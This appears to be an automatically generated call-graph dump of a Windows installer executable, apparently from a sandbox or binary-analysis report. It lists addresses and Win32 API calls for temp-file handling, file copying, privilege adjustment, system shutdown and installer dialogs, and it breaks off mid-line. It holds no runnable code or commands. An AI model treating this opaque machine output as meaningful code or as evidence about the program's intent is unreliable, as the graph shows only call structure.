4037e9 3958 405f9e CharNextW 3957->3958 3959 40380f CharNextW 3958->3959 3969 403821 3959->3969 3960 403923 3961 403937 GetTempPathW 3960->3961 4029 403634 3961->4029 3963 40394f 3964 403953 GetWindowsDirectoryW lstrcatW 3963->3964 3965 4039a9 DeleteFileW 3963->3965 3967 403634 12 API calls 3964->3967 4039 4030f5 GetTickCount GetModuleFileNameW 3965->4039 3966 405f9e CharNextW 3966->3969 3970 40396f 3967->3970 3969->3960 3969->3966 3973 403925 3969->3973 3970->3965 3972 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3970->3972 3971 4039bd 3974 403bb0 ExitProcess CoUninitialize 3971->3974 3981 405f9e CharNextW 3971->3981 4010 403a64 3971->4010 3975 403634 12 API calls 3972->3975 4125 4066a2 lstrcpynW 3973->4125 3976 403bc2 3974->3976 3977 403be6 3974->3977 3979 4039a1 3975->3979 3980 405d02 MessageBoxIndirectW 3976->3980 3982 403c6a ExitProcess 3977->3982 3983 403bee GetCurrentProcess OpenProcessToken 3977->3983 3979->3965 3979->3974 3986 403bd0 ExitProcess 3980->3986 3991 4039dc 3981->3991 3987 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3983->3987 3988 403c3a 3983->3988 3987->3988 3990 406a96 5 API calls 3988->3990 3989 403a74 3989->3974 4001 403c41 3990->4001 3992 403a3a 3991->3992 3993 403a7d 3991->3993 3996 406079 18 API calls 3992->3996 4128 405c6d 3993->4128 3995 403c56 ExitWindowsEx 3995->3982 3998 403c63 3995->3998 3999 403a46 3996->3999 4002 40140b 2 API calls 3998->4002 3999->3974 4126 4066a2 lstrcpynW 3999->4126 4001->3995 4001->3998 4002->3982 4003 403a9c 4005 403ab4 4003->4005 4132 4066a2 lstrcpynW 4003->4132 4009 403ada wsprintfW 4005->4009 4024 403b06 4005->4024 4006 403a59 4127 4066a2 lstrcpynW 4006->4127 4011 4066df 21 API calls 4009->4011 4069 403d74 4010->4069 4011->4005 4014 403b50 SetCurrentDirectoryW 4017 406462 40 API calls 4014->4017 4015 403b16 GetFileAttributesW 4016 403b22 DeleteFileW 4015->4016 4015->4024 4016->4024 4019 403b5f CopyFileW 4017->4019 4018 403b4e 4018->3974 4019->4018 4019->4024 4020 405dae 71 API calls 4020->4024 4021 406462 40 API calls 4021->4024 4022 4066df 21 API calls 4022->4024 4023 405c85 2 API calls 4023->4024 4024->4005 4024->4009 4024->4014 4024->4015 4024->4018 4024->4020 4024->4021 4024->4022 4024->4023 4025 403bd8 CloseHandle 4024->4025 4026 4069ff 2 API calls 4024->4026 4133 405bf6 CreateDirectoryW 4024->4133 4136 405c50 CreateDirectoryW 4024->4136 4025->4018 4026->4024 4027->3955 4028->3957 4030 406950 5 API calls 4029->4030 4032 403640 4030->4032 4031 40364a 4031->3963 4032->4031 4033 405f71 3 API calls 4032->4033 4034 403652 4033->4034 4035 405c50 2 API calls 4034->4035 4036 403658 4035->4036 4037 4061c1 2 API calls 4036->4037 4038 403663 4037->4038 4038->3963 4139 406192 GetFileAttributesW CreateFileW 4039->4139 4041 403138 4068 403145 4041->4068 4140 4066a2 lstrcpynW 4041->4140 4043 40315b 4044 405fbd 2 API calls 4043->4044 4045 403161 4044->4045 4141 4066a2 lstrcpynW 4045->4141 4047 40316c GetFileSize 4048 403266 4047->4048 4059 403183 4047->4059 4049 403053 36 API calls 4048->4049 4050 40326f 4049->4050 4052 4032ab GlobalAlloc 4050->4052 4050->4068 4143 40361d SetFilePointer 4050->4143 4051 403607 ReadFile 4051->4059 4055 4032c2 4052->4055 4054 403303 4057 403053 36 API calls 4054->4057 4060 4061c1 2 API calls 4055->4060 4056 40328c 4058 403607 ReadFile 4056->4058 4057->4068 4061 403297 4058->4061 4059->4048 4059->4051 4059->4054 4062 403053 36 API calls 4059->4062 4059->4068 4063 4032d3 CreateFileW 4060->4063 4061->4052 4061->4068 4062->4059 4064 40330d 4063->4064 4063->4068 4142 40361d SetFilePointer 4064->4142 4066 40331b 4067 403396 48 API calls 4066->4067 4067->4068 4068->3971 4070 406a96 5 API calls 4069->4070 4071 403d88 4070->4071 4072 403da0 4071->4072 4073 403d8e 4071->4073 4074 406570 3 API calls 4072->4074 4159 4065e9 wsprintfW 4073->4159 4075 403dd0 4074->4075 4077 403def lstrcatW 4075->4077 4079 406570 3 API calls 4075->4079 4078 403d9e 4077->4078 4144 40404a 4078->4144 4079->4077 4082 406079 18 API calls 4083 403e21 4082->4083 4084 403eb5 4083->4084 4086 406570 3 API calls 4083->4086 4085 406079 18 API calls 4084->4085 4087 403ebb 4085->4087 4093 403e53 4086->4093 4088 403ecb LoadImageW 4087->4088 4089 4066df 21 API calls 4087->4089 4090 403f71 4088->4090 4091 403ef2 RegisterClassW 4088->4091 4089->4088 4095 40140b 2 API calls 4090->4095 4094 403f28 SystemParametersInfoW CreateWindowExW 4091->4094 4124 403f7b 4091->4124 4092 403e74 lstrlenW 4097 403e82 lstrcmpiW 4092->4097 4098 403ea8 4092->4098 4093->4084 4093->4092 4096 405f9e CharNextW 4093->4096 4094->4090 4099 403f77 4095->4099 4101 403e71 4096->4101 4097->4098 4102 403e92 GetFileAttributesW 4097->4102 4100 405f71 3 API calls 4098->4100 4103 40404a 22 API calls 4099->4103 4099->4124 4104 403eae 4100->4104 4101->4092 4105 403e9e 4102->4105 4107 403f88 4103->4107 4160 4066a2 lstrcpynW 4104->4160 4105->4098 4106 405fbd 2 API calls 4105->4106 4106->4098 4109 403f94 ShowWindow 4107->4109 4110 404017 4107->4110 4112 406a26 3 API calls 4109->4112 4152 4057fa OleInitialize 4110->4152 4114 403fac 4112->4114 4113 40401d 4115 404021 4113->4115 4116 404039 4113->4116 4117 403fba GetClassInfoW 4114->4117 4119 406a26 3 API calls 4114->4119 4122 40140b 2 API calls 4115->4122 4115->4124 4118 40140b 2 API calls 4116->4118 4120 403fe4 DialogBoxParamW 4117->4120 4121 403fce GetClassInfoW RegisterClassW 4117->4121 4118->4124 4119->4117 4123 40140b 2 API calls 4120->4123 4121->4120 4122->4124 4123->4124 4124->3989 4125->3961 4126->4006 4127->4010 4129 406a96 5 API calls 4128->4129 4130 403a82 lstrlenW 4129->4130 4131 4066a2 lstrcpynW 4130->4131 4131->4003 4132->4005 4134 405c42 4133->4134 4135 405c46 GetLastError 4133->4135 4134->4024 4135->4134 4137 405c60 4136->4137 4138 405c64 GetLastError 4136->4138 4137->4024 4138->4137 4139->4041 4140->4043 4141->4047 4142->4066 4143->4056 4145 40405e 4144->4145 4161 4065e9 wsprintfW 4145->4161 4147 4040cf 4148 404103 22 API calls 4147->4148 4150 4040d4 4148->4150 4149 403dff 4149->4082 4150->4149 4151 4066df 21 API calls 4150->4151 4151->4150 4153 40466d SendMessageW 4152->4153 4157 40581d 4153->4157 4154 405844 4155 40466d SendMessageW 4154->4155 4156 405856 CoUninitialize 4155->4156 4156->4113 4157->4154 4158 401389 2 API calls 4157->4158 4158->4157 4159->4078 4160->4084 4161->4147 4162 405866 4163 405a10 4162->4163 4164 405887 GetDlgItem GetDlgItem GetDlgItem 4162->4164 4166 405a41 4163->4166 4167 405a19 GetDlgItem CreateThread CloseHandle 4163->4167 4207 404656 SendMessageW 4164->4207 4169 405a6c 4166->4169 4171 405a91 4166->4171 4172 405a58 ShowWindow ShowWindow 4166->4172 4167->4166 4210 4057fa 5 API calls 4167->4210 4168 4058f7 4176 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4168->4176 4170 405acc 4169->4170 4173 405a80 4169->4173 4174 405aa6 ShowWindow 4169->4174 4170->4171 4184 405ada SendMessageW 4170->4184 4175 404688 8 API calls 4171->4175 4209 404656 SendMessageW 4172->4209 4178 4045fa SendMessageW 4173->4178 4180 405ac6 4174->4180 4181 405ab8 4174->4181 4179 405a9f 4175->4179 4182 405950 SendMessageW SendMessageW 4176->4182 4183 40596c 4176->4183 4178->4171 4186 4045fa SendMessageW 4180->4186 4185 405727 28 API calls 4181->4185 4182->4183 4187 405971 SendMessageW 4183->4187 4188 40597f 4183->4188 4184->4179 4189 405af3 CreatePopupMenu 4184->4189 4185->4180 4186->4170 4187->4188 4191 404621 22 API calls 4188->4191 4190 4066df 21 API calls 4189->4190 4192 405b03 AppendMenuW 4190->4192 4193 40598f 4191->4193 4194 405b20 GetWindowRect 4192->4194 4195 405b33 TrackPopupMenu 4192->4195 4196 405998 ShowWindow 4193->4196 4197 4059cc GetDlgItem SendMessageW 4193->4197 4194->4195 4195->4179 4198 405b4e 4195->4198 4199 4059bb 4196->4199 4200 4059ae ShowWindow 4196->4200 4197->4179 4201 4059f3 SendMessageW SendMessageW 4197->4201 4202 405b6a SendMessageW 4198->4202 4208 404656 SendMessageW 4199->4208 4200->4199 4201->4179 4202->4202 4203 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4202->4203 4205 405bac SendMessageW 4203->4205 4205->4205 4206 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4205->4206 4206->4179 4207->4168 4208->4197 4209->4169 4217 4015e6 4218 402dcb 21 API calls 4217->4218 4219 4015ed 4218->4219 4220 40601c 4 API calls 4219->4220 4234 4015f6 4220->4234 4221 401656 4223 401688 4221->4223 4224 40165b 4221->4224 4222 405f9e CharNextW 4222->4234 4226 401423 28 API calls 4223->4226 4225 401423 28 API calls 4224->4225 4227 401662 4225->4227 4232 401680 4226->4232 4236 4066a2 lstrcpynW 4227->4236 4229 405c50 2 API calls 4229->4234 4230 405c6d 5 API calls 4230->4234 4231 40166f SetCurrentDirectoryW 4231->4232 4233 40163c GetFileAttributesW 4233->4234 4234->4221 4234->4222 4234->4229 4234->4230 4234->4233 4235 405bf6 2 API calls 4234->4235 4235->4234 4236->4231 4248 401c68 4249 402da9 21 API calls 4248->4249 4250 401c6f 4249->4250 4251 402da9 21 API calls 4250->4251 4252 401c7c 4251->4252 4253 402dcb 21 API calls 4252->4253 4255 401c91 4252->4255 4253->4255 4254 401ca1 4257 401cf8 4254->4257 4258 401cac 4254->4258 4255->4254 4256 402dcb 21 API calls 4255->4256 4256->4254 4259 402dcb 21 API calls 4257->4259 4260 402da9 21 API calls 4258->4260 4262 401cfd 4259->4262 4261 401cb1 4260->4261 4263 402da9 21 API calls 4261->4263 4264 402dcb 21 API calls 4262->4264 4265 401cbd 4263->4265 4266 401d06 FindWindowExW 4264->4266 4267 401ce8 SendMessageW 4265->4267 4268 401cca SendMessageTimeoutW 4265->4268 4269 401d28 4266->4269 4267->4269 4268->4269 4550 404e68 4551 404e94 4550->4551 4552 404e78 4550->4552 4554 404ec7 4551->4554 4555 404e9a SHGetPathFromIDListW 4551->4555 4561 405ce6 GetDlgItemTextW 4552->4561 4557 404eb1 SendMessageW 4555->4557 4558 404eaa 4555->4558 4556 404e85 SendMessageW 4556->4551 4557->4554 4559 40140b 2 API calls 4558->4559 4559->4557 4561->4556 4562 4028e9 4563 4028ef 4562->4563 4564 4028f7 FindClose 4563->4564 4565 402c4f 4563->4565 4564->4565 4566 4016f1 4567 402dcb 21 API calls 4566->4567 4568 4016f7 GetFullPathNameW 4567->4568 4569 401733 4568->4569 4570 401711 4568->4570 4571 401748 GetShortPathNameW 4569->4571 4572 402c4f 4569->4572 4570->4569 4573 4069ff 2 API calls 4570->4573 4571->4572 4574 401723 4573->4574 4574->4569 4576 4066a2 lstrcpynW 4574->4576 4576->4569 4577 401e73 GetDC 4578 402da9 21 API calls 4577->4578 4579 401e85 GetDeviceCaps MulDiv ReleaseDC 4578->4579 4580 402da9 21 API calls 4579->4580 4581 401eb6 4580->4581 4582 4066df 21 API calls 4581->4582 4583 401ef3 CreateFontIndirectW 4582->4583 4584 40265d 4583->4584 4305 402975 4306 402dcb 21 API calls 4305->4306 4307 402981 4306->4307 4308 402997 4307->4308 4309 402dcb 21 API calls 4307->4309 4310 40616d 2 API calls 4308->4310 4309->4308 4311 40299d 4310->4311 4333 406192 GetFileAttributesW CreateFileW 4311->4333 4313 4029aa 4314 402a60 4313->4314 4315 4029c5 GlobalAlloc 4313->4315 4316 402a48 4313->4316 4317 402a67 DeleteFileW 4314->4317 4318 402a7a 4314->4318 4315->4316 4319 4029de 4315->4319 4320 403396 48 API calls 4316->4320 4317->4318 4334 40361d SetFilePointer 4319->4334 4322 402a55 CloseHandle 4320->4322 4322->4314 4323 4029e4 4324 403607 ReadFile 4323->4324 4325 4029ed GlobalAlloc 4324->4325 4326 402a31 4325->4326 4327 4029fd 4325->4327 4328 406244 WriteFile 4326->4328 4329 403396 48 API calls 4327->4329 4330 402a3d GlobalFree 4328->4330 4332 402a0a 4329->4332 4330->4316 4331 402a28 GlobalFree 4331->4326 4332->4331 4333->4313 4334->4323 4585 4014f5 SetForegroundWindow 4586 402c4f 4585->4586 4601 40197b 4602 402dcb 21 API calls 4601->4602 4603 401982 lstrlenW 4602->4603 4604 40265d 4603->4604 4351 4020fd 4352 40210f 4351->4352 4362 4021c1 4351->4362 4353 402dcb 21 API calls 4352->4353 4355 402116 4353->4355 4354 401423 28 API calls 4356 40231b 4354->4356 4357 402dcb 21 API calls 4355->4357 4358 40211f 4357->4358 4359 402135 LoadLibraryExW 4358->4359 4360 402127 GetModuleHandleW 4358->4360 4361 402146 4359->4361 4359->4362 4360->4359 4360->4361 4373 406b05 4361->4373 4362->4354 4365 402190 4369 405727 28 API calls 4365->4369 4366 402157 4367 402176 KiUserCallbackDispatcher 4366->4367 4368 40215f 4366->4368 4371 402167 4367->4371 4370 401423 28 API calls 4368->4370 4369->4371 4370->4371 4371->4356 4372 4021b3 FreeLibrary 4371->4372 4372->4356 4378 4066c4 WideCharToMultiByte 4373->4378 4375 406b22 4376 406b29 GetProcAddress 4375->4376 4377 402151 4375->4377 4376->4377 4377->4365 4377->4366 4378->4375 4612 402b7e 4613 402bd0 4612->4613 4614 402b85 4612->4614 4615 406a96 5 API calls 4613->4615 4617 402da9 21 API calls 4614->4617 4618 402bce 4614->4618 4616 402bd7 4615->4616 4619 402dcb 21 API calls 4616->4619 4620 402b93 4617->4620 4621 402be0 4619->4621 4622 402da9 21 API calls 4620->4622 4621->4618 4623 402be4 IIDFromString 4621->4623 4625 402b9f 4622->4625 4623->4618 4624 402bf3 4623->4624 4624->4618 4630 4066a2 lstrcpynW 4624->4630 4629 4065e9 wsprintfW 4625->4629 4627 402c10 CoTaskMemFree 4627->4618 4629->4618 4630->4627 4631 401000 4632 401037 BeginPaint GetClientRect 4631->4632 4633 40100c DefWindowProcW 4631->4633 4635 4010f3 4632->4635 4636 401179 4633->4636 4637 401073 CreateBrushIndirect FillRect DeleteObject 4635->4637 4638 4010fc 4635->4638 4637->4635 4639 401102 CreateFontIndirectW 4638->4639 4640 401167 EndPaint 4638->4640 4639->4640 4641 401112 6 API calls 4639->4641 4640->4636 4641->4640 4642 402a80 4643 402da9 21 API calls 4642->4643 4644 402a86 4643->4644 4645 402ac9 4644->4645 4646 402aad 4644->4646 4649 402953 4644->4649 4647 402ae3 4645->4647 4648 402ad3 4645->4648 4651 402ab2 4646->4651 4655 402ac3 4646->4655 4650 4066df 21 API calls 4647->4650 4652 402da9 21 API calls 4648->4652 4650->4655 4656 4066a2 lstrcpynW 4651->4656 4652->4655 4655->4649 4657 4065e9 wsprintfW 4655->4657 4656->4649 4657->4649 3335 401781 3341 402dcb 3335->3341 3339 40178f 3340 4061c1 2 API calls 3339->3340 3340->3339 3342 402dd7 3341->3342 3343 4066df 21 API calls 3342->3343 3344 402df8 3343->3344 3345 401788 3344->3345 3346 406950 5 API calls 3344->3346 3347 4061c1 3345->3347 3346->3345 3348 4061ce GetTickCount GetTempFileNameW 3347->3348 3349 406208 3348->3349 3350 406204 3348->3350 3349->3339 3350->3348 3350->3349 3351 403c82 3352 403c93 CloseHandle 3351->3352 3353 403c9d 3351->3353 3352->3353 3354 403cb1 3353->3354 3355 403ca7 CloseHandle 3353->3355 3360 403cdf 3354->3360 3355->3354 3361 403ced 3360->3361 3362 403cb6 3361->3362 3363 403cf2 FreeLibrary GlobalFree 3361->3363 3364 405dae 3362->3364 3363->3362 3363->3363 3400 406079 3364->3400 3367 405dd6 DeleteFileW 3369 403cc2 3367->3369 3368 405ded 3371 405f0d 3368->3371 3414 4066a2 lstrcpynW 3368->3414 3371->3369 3443 4069ff FindFirstFileW 3371->3443 3372 405e13 3373 405e26 3372->3373 3374 405e19 lstrcatW 3372->3374 3435 405fbd lstrlenW 3373->3435 3375 405e2c 3374->3375 3378 405e3c lstrcatW 3375->3378 3380 405e47 lstrlenW FindFirstFileW 3375->3380 3378->3380 3380->3371 3398 405e69 3380->3398 3383 405ef0 FindNextFileW 3386 405f06 FindClose 3383->3386 3383->3398 3384 405d66 5 API calls 3387 405f48 3384->3387 3386->3371 3388 405f62 3387->3388 3389 405f4c 3387->3389 3391 405727 28 API calls 3388->3391 3389->3369 3392 405727 28 API calls 3389->3392 3391->3369 3394 405f59 3392->3394 3393 405dae 64 API calls 3393->3398 3396 406462 40 API calls 3394->3396 3396->3369 3397 405727 28 API calls 3397->3398 3398->3383 3398->3393 3398->3397 3415 4066a2 lstrcpynW 3398->3415 3416 405d66 3398->3416 3424 405727 3398->3424 3439 406462 MoveFileExW 3398->3439 3449 4066a2 lstrcpynW 3400->3449 3402 40608a 3450 40601c CharNextW CharNextW 3402->3450 3405 405dce 3405->3367 3405->3368 3406 406950 5 API calls 3412 4060a0 3406->3412 3407 4060d1 lstrlenW 3408 4060dc 3407->3408 3407->3412 3409 405f71 3 API calls 3408->3409 3411 4060e1 GetFileAttributesW 3409->3411 3410 4069ff 2 API calls 3410->3412 3411->3405 3412->3405 3412->3407 3412->3410 3413 405fbd 2 API calls 3412->3413 3413->3407 3414->3372 3415->3398 3456 40616d GetFileAttributesW 3416->3456 3419 405d93 3419->3398 3420 405d81 RemoveDirectoryW 3422 405d8f 3420->3422 3421 405d89 DeleteFileW 3421->3422 3422->3419 3423 405d9f SetFileAttributesW 3422->3423 3423->3419 3425 405742 3424->3425 3434 4057e4 3424->3434 3426 40575e lstrlenW 3425->3426 3429 4066df 21 API calls 3425->3429 3427 405787 3426->3427 3428 40576c lstrlenW 3426->3428 3431 40579a 3427->3431 3432 40578d SetWindowTextW 3427->3432 3430 40577e lstrcatW 3428->3430 3428->3434 3429->3426 3430->3427 3433 4057a0 SendMessageW SendMessageW SendMessageW 3431->3433 3431->3434 3432->3431 3433->3434 3434->3383 3436 405fcb 3435->3436 3437 405fd1 CharPrevW 3436->3437 3438 405fdd 3436->3438 3437->3436 3437->3438 3438->3375 3440 406483 3439->3440 3441 406476 3439->3441 3440->3398 3459 4062e8 3441->3459 3444 405f32 3443->3444 3445 406a15 FindClose 3443->3445 3444->3369 3446 405f71 lstrlenW CharPrevW 3444->3446 3445->3444 3447 405f3c 3446->3447 3448 405f8d lstrcatW 3446->3448 3447->3384 3448->3447 3449->3402 3451 406039 3450->3451 3452 40604b 3450->3452 3451->3452 3453 406046 CharNextW 3451->3453 3454 405f9e CharNextW 3452->3454 3455 40606f 3452->3455 3453->3455 3454->3452 3455->3405 3455->3406 3457 405d72 3456->3457 3458 40617f SetFileAttributesW 3456->3458 3457->3419 3457->3420 3457->3421 3458->3457 3460 406318 3459->3460 3461 40633e GetShortPathNameW 3459->3461 3486 406192 GetFileAttributesW CreateFileW 3460->3486 3462 406353 3461->3462 3463 40645d 3461->3463 3462->3463 3466 40635b wsprintfA 3462->3466 3463->3440 3465 406322 CloseHandle GetShortPathNameW 3465->3463 3467 406336 3465->3467 3468 4066df 21 API calls 3466->3468 3467->3461 3467->3463 3469 406383 3468->3469 3487 406192 GetFileAttributesW CreateFileW 3469->3487 3471 406390 3471->3463 3472 40639f GetFileSize GlobalAlloc 3471->3472 3473 4063c1 3472->3473 3474 406456 CloseHandle 3472->3474 3488 406215 ReadFile 3473->3488 3474->3463 3479 4063e0 lstrcpyA 3481 406402 3479->3481 3480 4063f4 3482 4060f7 4 API calls 3480->3482 3483 406439 SetFilePointer 3481->3483 3482->3481 3495 406244 WriteFile 3483->3495 3486->3465 3487->3471 3489 406233 3488->3489 3489->3474 3490 4060f7 lstrlenA 3489->3490 3491 406138 lstrlenA 3490->3491 3492 406140 3491->3492 3493 406111 lstrcmpiA 3491->3493 3492->3479 3492->3480 3493->3492 3494 40612f CharNextA 3493->3494 3494->3491 3496 406262 GlobalFree 3495->3496 3496->3474 4658 401d82 4659 402da9 21 API calls 4658->4659 4660 401d93 SetWindowLongW 4659->4660 4661 402c4f 4660->4661 3516 402903 3517 40290b 3516->3517 3518 40290f FindNextFileW 3517->3518 3520 402921 3517->3520 3519 402968 3518->3519 3518->3520 3522 4066a2 lstrcpynW 3519->3522 3522->3520 3523 401f03 3524 402da9 21 API calls 3523->3524 3525 401f09 3524->3525 3526 402da9 21 API calls 3525->3526 3527 401f15 3526->3527 3528 401f21 ShowWindow 3527->3528 3529 401f2c EnableWindow 3527->3529 3530 402c4f 3528->3530 3529->3530 4662 401503 4663 401508 4662->4663 4664 40152e 4662->4664 4665 402da9 21 API calls 4663->4665 4665->4664 4666 401588 4667 402bc9 4666->4667 4670 4065e9 wsprintfW 4667->4670 4669 402bce 4670->4669 4678 40198d 4679 402da9 21 API calls 4678->4679 4680 401994 4679->4680 4681 402da9 21 API calls 4680->4681 4682 4019a1 4681->4682 4683 402dcb 21 API calls 4682->4683 4684 4019b8 lstrlenW 4683->4684 4685 4019c9 4684->4685 4686 401a0a 4685->4686 4690 4066a2 lstrcpynW 4685->4690 4688 4019fa 4688->4686 4689 4019ff lstrlenW 4688->4689 4689->4686 4690->4688 4691 40508e GetDlgItem GetDlgItem 4692 4050e0 7 API calls 4691->4692 4705 405305 4691->4705 4693 405187 DeleteObject 4692->4693 4694 40517a SendMessageW 4692->4694 4695 405190 4693->4695 4694->4693 4697 4051c7 4695->4697 4699 4066df 21 API calls 4695->4699 4696 4053e7 4698 405493 4696->4698 4708 405440 SendMessageW 4696->4708 4731 4052f8 4696->4731 4700 404621 22 API calls 4697->4700 4703 4054a5 4698->4703 4704 40549d SendMessageW 4698->4704 4706 4051a9 SendMessageW SendMessageW 4699->4706 4701 4051db 4700->4701 4707 404621 22 API calls 4701->4707 4702 405374 4702->4696 4709 4053d9 SendMessageW 4702->4709 4715 4054b7 ImageList_Destroy 4703->4715 4716 4054be 4703->4716 4727 4054ce 4703->4727 4704->4703 4705->4696 4705->4702 4745 404fdc SendMessageW 4705->4745 4706->4695 4722 4051ec 4707->4722 4713 405455 SendMessageW 4708->4713 4708->4731 4709->4696 4710 404688 8 API calls 4714 405694 4710->4714 4712 405648 4720 40565a ShowWindow GetDlgItem ShowWindow 4712->4720 4712->4731 4719 405468 4713->4719 4715->4716 4717 4054c7 GlobalFree 4716->4717 4716->4727 4717->4727 4718 4052c7 GetWindowLongW SetWindowLongW 4721 4052e0 4718->4721 4728 405479 SendMessageW 4719->4728 4720->4731 4723 4052e5 ShowWindow 4721->4723 4724 4052fd 4721->4724 4722->4718 4726 40523f SendMessageW 4722->4726 4729 4052c2 4722->4729 4732 405291 SendMessageW 4722->4732 4733 40527d SendMessageW 4722->4733 4743 404656 SendMessageW 4723->4743 4744 404656 SendMessageW 4724->4744 4726->4722 4727->4712 4738 405509 4727->4738 4750 40505c 4727->4750 4728->4698 4729->4718 4729->4721 4731->4710 4732->4722 4733->4722 4735 405613 4736 40561e InvalidateRect 4735->4736 4739 40562a 4735->4739 4736->4739 4737 405537 SendMessageW 4742 40554d 4737->4742 4738->4737 4738->4742 4739->4712 4740 404f97 24 API calls 4739->4740 4740->4712 4741 4055c1 SendMessageW SendMessageW 4741->4742 4742->4735 4742->4741 4743->4731 4744->4705 4746 40503b SendMessageW 4745->4746 4747 404fff GetMessagePos ScreenToClient SendMessageW 4745->4747 4749 405033 4746->4749 4748 405038 4747->4748 4747->4749 4748->4746 4749->4702 4759 4066a2 lstrcpynW 4750->4759 4752 40506f 4760 4065e9 wsprintfW 4752->4760 4754 405079 4755 40140b 2 API calls 4754->4755 4756 405082 4755->4756 4761 4066a2 lstrcpynW 4756->4761 4758 405089 4758->4738 4759->4752 4760->4754 4761->4758 4762 40168f 4763 402dcb 21 API calls 4762->4763 4764 401695 4763->4764 4765 4069ff 2 API calls 4764->4765 4766 40169b 4765->4766 4767 402b10 4768 402da9 21 API calls 4767->4768 4769 402b16 4768->4769 4770 4066df 21 API calls 4769->4770 4771 402953 4769->4771 4770->4771 3591 402711 3592 402da9 21 API calls 3591->3592 3601 402720 3592->3601 3593 40285d 3594 40276a ReadFile 3594->3593 3594->3601 3595 402803 3595->3593 3595->3601 3605 406273 SetFilePointer 3595->3605 3596 406215 ReadFile 3596->3601 3597 4027aa MultiByteToWideChar 3597->3601 3598 40285f 3614 4065e9 wsprintfW 3598->3614 3601->3593 3601->3594 3601->3595 3601->3596 3601->3597 3601->3598 3602 4027d0 SetFilePointer MultiByteToWideChar 3601->3602 3603 402870 3601->3603 3602->3601 3603->3593 3604 402891 SetFilePointer 3603->3604 3604->3593 3606 40628f 3605->3606 3613 4062a7 3605->3613 3607 406215 ReadFile 3606->3607 3608 40629b 3607->3608 3609 4062b0 SetFilePointer 3608->3609 3610 4062d8 SetFilePointer 3608->3610 3608->3613 3609->3610 3611 4062bb 3609->3611 3610->3613 3612 406244 WriteFile 3611->3612 3612->3613 3613->3595 3614->3593 4772 404791 lstrlenW 4773 4047b0 4772->4773 4774 4047b2 WideCharToMultiByte 4772->4774 4773->4774 4775 401491 4776 405727 28 API calls 4775->4776 4777 401498 4776->4777 3615 404b12 3616 404b3e 3615->3616 3617 404b4f 3615->3617 3698 405ce6 GetDlgItemTextW 3616->3698 3619 404b5b GetDlgItem 3617->3619 3625 404bc7 3617->3625 3621 404b6f 3619->3621 3620 404b49 3623 406950 5 API calls 3620->3623 3624 404b83 SetWindowTextW 3621->3624 3629 40601c 4 API calls 3621->3629 3622 404c9e 3678 404e4d 3622->3678 3685 405ce6 GetDlgItemTextW 3622->3685 3623->3617 3681 404621 3624->3681 3625->3622 3630 4066df 21 API calls 3625->3630 3625->3678 3636 404b79 3629->3636 3632 404c2e SHBrowseForFolderW 3630->3632 3631 404cce 3633 406079 18 API calls 3631->3633 3632->3622 3637 404c46 CoTaskMemFree 3632->3637 3638 404cd4 3633->3638 3634 404b9f 3639 404621 22 API calls 3634->3639 3636->3624 3642 405f71 3 API calls 3636->3642 3640 405f71 3 API calls 3637->3640 3686 4066a2 lstrcpynW 3638->3686 3641 404bad 3639->3641 3643 404c53 3640->3643 3684 404656 SendMessageW 3641->3684 3642->3624 3646 404c8a SetDlgItemTextW 3643->3646 3651 4066df 21 API calls 3643->3651 3646->3622 3647 404ceb 3649 406a96 5 API calls 3647->3649 3648 404bb3 3650 406a96 5 API calls 3648->3650 3665 404cf2 3649->3665 3652 404bba 3650->3652 3653 404c72 lstrcmpiW 3651->3653 3655 404bc2 SHAutoComplete 3652->3655 3652->3678 3653->3646 3657 404c83 lstrcatW 3653->3657 3654 404d33 3699 4066a2 lstrcpynW 3654->3699 3655->3625 3657->3646 3658 404d01 GetDiskFreeSpaceExW 3658->3665 3668 404d8b 3658->3668 3659 404d3a 3660 40601c 4 API calls 3659->3660 3661 404d40 3660->3661 3663 404d46 3661->3663 3664 404d49 GetDiskFreeSpaceW 3661->3664 3662 405fbd 2 API calls 3662->3665 3663->3664 3666 404d64 MulDiv 3664->3666 3664->3668 3665->3654 3665->3658 3665->3662 3666->3668 3667 404dfc 3670 404e1f 3667->3670 3700 40140b 3667->3700 3668->3667 3687 404f97 3668->3687 3703 404643 KiUserCallbackDispatcher 3670->3703 3673 404dfe SetDlgItemTextW 3673->3667 3674 404dee 3690 404ece 3674->3690 3676 404e3b 3676->3678 3679 404e48 3676->3679 3707 404688 3678->3707 3704 404a6b 3679->3704 3682 4066df 21 API calls 3681->3682 3683 40462c SetDlgItemTextW 3682->3683 3683->3634 3684->3648 3685->3631 3686->3647 3688 404ece 24 API calls 3687->3688 3689 404de9 3688->3689 3689->3673 3689->3674 3691 404ee7 3690->3691 3692 4066df 21 API calls 3691->3692 3693 404f4b 3692->3693 3694 4066df 21 API calls 3693->3694 3695 404f56 3694->3695 3696 4066df 21 API calls 3695->3696 3697 404f6c lstrlenW wsprintfW SetDlgItemTextW 3696->3697 3697->3667 3698->3620 3699->3659 3721 401389 3700->3721 3703->3676 3705 404a79 3704->3705 3706 404a7e SendMessageW 3704->3706 3705->3706 3706->3678 3708 40474b 3707->3708 3709 4046a0 GetWindowLongW 3707->3709 3709->3708 3710 4046b5 3709->3710 3710->3708 3711 4046e2 GetSysColor 3710->3711 3712 4046e5 3710->3712 3711->3712 3713 4046f5 SetBkMode 3712->3713 3714 4046eb SetTextColor 3712->3714 3715 404713 3713->3715 3716 40470d GetSysColor 3713->3716 3714->3713 3717 404724 3715->3717 3718 40471a SetBkColor 3715->3718 3716->3715 3717->3708 3719 404737 DeleteObject 3717->3719 3720 40473e CreateBrushIndirect 3717->3720 3718->3717 3719->3720 3720->3708 3723 401390 3721->3723 3722 4013fe 3722->3670 3723->3722 3724 4013cb MulDiv SendMessageW 3723->3724 3724->3723 3725 401794 3726 402dcb 21 API calls 3725->3726 3727 40179b 3726->3727 3728 4017c3 3727->3728 3729 4017bb 3727->3729 3780 4066a2 lstrcpynW 3728->3780 3779 4066a2 lstrcpynW 3729->3779 3732 4017c1 3736 406950 5 API calls 3732->3736 3733 4017ce 3734 405f71 3 API calls 3733->3734 3735 4017d4 lstrcatW 3734->3735 3735->3732 3752 4017e0 3736->3752 3737 4069ff 2 API calls 3737->3752 3738 40616d 2 API calls 3738->3752 3740 4017f2 CompareFileTime 3740->3752 3741 4018b2 3742 405727 28 API calls 3741->3742 3743 4018bc 3742->3743 3764 403396 3743->3764 3744 405727 28 